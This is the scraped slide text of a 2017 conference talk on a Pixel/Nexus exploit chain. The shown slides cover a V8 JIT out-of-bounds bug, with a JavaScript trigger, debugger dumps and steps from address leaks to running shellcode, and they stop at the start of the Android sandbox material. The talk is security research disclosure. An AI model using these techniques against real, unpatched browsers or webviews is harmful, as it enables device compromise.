pwning the nexus of every pixel
play

Pwning the Nexus of Every Pixel Qidan He Gengming Liu CanSecWest - PowerPoint PPT Presentation

Pwning the Nexus of Every Pixel Qidan He Gengming Liu CanSecWest 2017 Vancouver #whoami Qidan He Apple/Android/Chrome CVE hunter (dozens of credits got) Speaker at BlackHat USA/ASIA, DEFCON, RECON, CanSecWest, HITCON


  1. Pwning the Nexus ™ of Every Pixel ™ Qidan He Gengming Liu CanSecWest 2017 Vancouver

  2. #whoami • Qidan He • Apple/Android/Chrome CVE hunter (dozens of credits got) • Speaker at BlackHat USA/ASIA, DEFCON, RECON, CanSecWest, HITCON • Pwn2Own 2016/ Mobile Pwn2Own 2016 winner • Gengming Liu • CTF enthusiastic, DEFCON CTF final player • Captain of AAA CTF team • Mobile Pwn2Own 2016 winner • Too busy occupied in Pwn2Own to talk L

  3. About Tencent Keen Security Lab • Previously known as KeenTeam • Won iOS 7 category in Mobile Pwn2Own 2013 • Won Nexus 6p/iOS 10.1 and got “Master of Pwn” in Mobile Pwn2Own 2016

  4. TL;DR: How we pwned newest Nexus6P/Pixel running Nougat • Three bugs forms a complete exploit chain • One V8 bug to compromise the renderer • One IPC bug to escape sandbox • One bug in gapps allows app install • Google response very quickly • V8 and IPC bug fixed in midnight of 10.26 (CVE-2016-5197 and CVE-2016- 5198) • Gapp update pushed in 10.27 (Google VRP credit) • Also affects all apps using webview/chromium

  5. Agenda • Introduction and Exploitation of V8 engine • Introduction and Exploitation of sandbox on Android • How we pwned Nexus/Pixel on Mobile Pwn2Own 2016 with 3 bugs • CVE-2016-5197/5198/GoogleVRP bug

  6. History of classical Chrome exploits • MWR Labs, Pwn2Own 2013 • Type-confusion in webkit • Arbitrary zero write in IPC::OnContentBlocked • Pinkie Pie, Mobile Pwn2Own 2013 • Runtime_TypedArrayInitializeFromArrayLike for renderer code execution • Arbitrary free in ClipboardHostMsg_WriteObjectsAsync • Geohot in Pwnium 4 • Property redefinition lead to OOB read/write in renderer • Spoof IPC Message to vulnerable extension in privileged domain • Lokihart in Pwn2Own 2015 • TOCTOU in GPU process sharedmemory • Juri In Pwn2Own 2015 • UAF in P2PSocketDispatcherHost

  7. V8 Javascript Engine • Widely known and used • Runtime optimization and JIT to machine code • Strongtalk • Crankshaft • Turbofan

  8. Object structure in V8

  9. var a = new ArrayBuffer(0x6161) 0x2036cb90a089: [JSArrayBuffer] - map = 0xebbd6702db1 [FastProperties] - prototype = 0x32cfe5005599 - elements = 0x1b6415782241 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS] - internal fields: 2 - backing_store = 0x5652757bea60 - byte_length = 24929 - properties = { } - internal fields = { 0 0 }

  10. var a = new ArrayBuffer(0x6161) 0x2036cb90a089: [JSArrayBuffer] gdb-peda$ x/30xg 0x00002036cb90a088 - map = 0xebbd6702db1 [FastProperties] 0x2036cb90a088: 0x00000ebbd6702db1 - prototype = 0x32cfe5005599 0x00001b6415782241 - elements = 0x1b6415782241 <FixedArray[0]> 0x2036cb90a098: 0x00001b6415782241 [FAST_HOLEY_SMI_ELEMENTS] 0x0000616100000000 - internal fields: 2 0x2036cb90a0a8: 0x00005652757bea60 - backing_store = 0x5652757bea60 0x0000000000000004 - byte_length = 24929 - properties = { } - internal fields = { 0 0 }

  11. Boxing in V8 • Float&Double encapsulated in V8 heap • HeapNumber object • vmovsd QWORD PTR [rax+0x7],xmm0 • SMI • Tagged pointer

  12. Case study: CVE-2016-1646 • V8 Array.concat redefinition out-of-bounds in Pwn2Own 2016 • Reported by Wen Xu from KeenLab

  13. Case study: CVE-2016-1646

  14. CVE-2016-5197 – Chain of Bugs #1 • Found by KeenLab and used for Mobile Pwn2Own 2016 • Affects all engines based on V8 and applications with Webview

  15. How we exploited CVE-2016-5198

  16. CVE-2016-5198 By KeenLab

  17. CVE-2016-5197

  18. How your JIT sucks • JIT compiles with type-info in mind • Access code generated accordingly • What if object type changed? • Deoptimize and regenerate • But… there will be mistakes • What if JITed access on globals?

  19. function Ctor () { var n; n = new Set (); function Ctor() { } n = new Set(); function Check () { } n.xyz = 0 x826852f4 ; function Check() { n.xyz = 0x826852f4; parseInt ( 'AAAAAAAA' ); } } Ctor(); for ( var i =0; i <2000; ++ i ) { Ctor(); %OptimizeFunctionOnNextCall(Ctor); Ctor (); Ctor(); } Check(); for ( var i =0; i <2000; ++ i ) { Check(); Check (); %OptimizeFunctionOnNextCall(Check); Check(); } Ctor(); Ctor (); Check(); Check (); parseInt('AAAAAAAA') print (" finish ");

  20. OOB in Optimized JIT code

  21. OOB in Optimized JIT code

  22. Optimized code for Ctor

  23. Non-optimized code for func `Check`

  24. Optimized

  25. Optimized

  26. 0x3f938587243 35 48b8c1bf4a339d070000 REX.W movq rax,0x79d334abfc1 ;; object: 0x79d334abfc1 PropertyCell for 0x130199d54631 <a Set with map 0x1ffdd430c391> 0x3f93858724d 45 488b400f REX.W movq rax,[rax+0xf]

  27. Optimized

  28. 0x3f938587251 49 49ba0000805e0a4de041 REX.W movq r10,0x41e04d0a5e800000 0x3f93858725b 59 c4c1f96ec2 vmovq xmm0,r10 0x3f938587260 64 488b4007 REX.W movq rax,[rax+0x7] 0x3f938587264 68 488b400f REX.W movq rax,[rax+0xf] 0x3f938587268 72 c5fb114007 vmovsd [rax+0x7],xmm0

  29. Heap number overwrite

  30. Normally… • Optimized code assumes the object already have property

  31. � � PROP_CELL_MAP 0x2ab4ce002a99 Javascript: n.xyz = 0x41414141 0x41414141 Map value mov rax,QWORD PTR [rax+0xf] PropertyCell n: 0x79d334abfc1 mov rax,QWORD PTR [rax+0xf] Property Map length:1 … 1 Properti element Map tables es s Non-empty FixedArray JSSet: 0x130199d5c511 mov rax,QWORD PTR [rax+0x7] JS_SET_TYPE_MAP

  32. However… • What if the object is changed and it doesn’t have property now?

  33. � � PROP_CELL_MAP 0x2ab4ce002a99 Property Map length:1 Property 1 Map value Non-empty FixedArray PropertyCell n: 0x79d334abfc1 OUT OF BOUNDS HERE! mov rax,QWORD PTR [rax+0xf] mov rax,QWORD PTR [rax+0x7] Properti element Hashco Map tables Map length:0 Map length Chars es s de JSSet: 0x130199d5c511 Empty FixedArray Null string mov rax,QWORD PTR [rax+0xf] JS_SET_TYPE_MAP 0x41414141

  34. Out-of-bound to null string • Overwriting fields of null string • With heapnumber overwrite we can do an indirect write

  35. � � PROP_CELL_MAP 0x2ab4ce002a99 Property Map length:1 Property 1 Map value Non-empty FixedArray PropertyCell n: 0x79d334abfc1 mov rax,QWORD PTR [rax+0xf] Chars interpreted as Pointer mov rax,QWORD PTR [rax+0x7] Properti element Hashco Chars Map tables Map length:0 Map length es s de 0x4141414141.. JSSet: 0x130199d5c511 Empty FixedArray Null string mov rax,QWORD PTR [rax+0xf] vmovsd QWORD PTR [rax+0x7],xmm0 JS_SET_TYPE_MAP 0x41e04d0a5e800000 0x826852f4 Map …type … Map for ONE_BYTE_INTERNALIZED_STRING_TYPE OUT OF BOUNDS HERE! Confused to EXTERNAL_STRING

  36. Exploitation Steps • OOB write chars field of null string to leak ArrayBuffer address • Overwrite ArrayBuffer backing_store to leak Function code address • Overwrite ArrayBuffer backing_store with Function code address • Write shellcode to ArrayBuffer and exec!

  37. Primitives Structure of ONE_BYTE_INTERNALIZED_STRING • Write primitive: pwndbg> job 0x28b4ff7ab259 • HeapNumber write #fuck pwndbg> x/40xg 0x28b4ff7ab258 • *(p + 8) = v 0x28b4ff7ab258: 0x0000090b4b182361 0x000000005887594a • Read primitive 0x28b4ff7ab268: 0x0000000400000000 0xdeadbeed6b637566 • ArrayBuffer length is our friend • But first … leak an ArrayBuffer address • Use #null string to cold start!

  38. #null string as cold start – Run #1 • OOB write null string length • OOB write chars field • m.d = ab (new ArrayBuffer) • new String(null) • charCodeAt for each byte • ArrayBuffer and #null string address leaked! • Got something to write at… • But still, how to turn sequential write into arbitrary address write?

  39. #null string as cold start – Run #2 • Write address of #null itself to its field! • m.d = null_str • Perform HeapNumber overwrite in next optimization run • m.d = unpackIEEE754(ab_len_ptr)

  40. Play with Function – Run #3 • Allocate Function at begining • ab_storage_ptr = ab_len_ptr + 8 • m.b = unpackIEEE754(addr_of_code - 8) • HeapNumber overwrite *ab_storage_ptr = code_loc – 8 • Code_ptr = ab[3]<< 32 + ab[2]

  41. Play with Function - Run ## • m.b = unpackIEEE754(code_ptr) • *ab_storage_ptr = code_ptr • Write shellcode with ab access • Call Function • Game over! J

  42. So renderer code execution got… • Now what?

  43. The anatomy of Chrome sandbox • All untrusted code runs in Target process • Relay most operations to Broker • Try best to • lock down the capabilities of renderer • Even renderer is compromised • Access is still strictly prohibited • GPU process have higher level access • Than normal sandbox process

  44. The new comer: GPU process

  45. Evolution of the Android Sandbox (old time)

  46. Evolution of the Android Sandbox (current state)

  47. Process privileges in Android media Isolated_ Adb shell Untrusted_app app Kernel System_server radio

  48. State-of-art defense of Android sandbox • DAC introduced by nature of Linux • IsolatedProcess introduced in JellyBean • SELinux enforced in KitKat • Further restricted in subsequent release

  49. Chromium Android Sandbox (cont.) • On Android, Chromium leverages the isolatedProcess feature to implement its sandbox.

Recommend


More recommend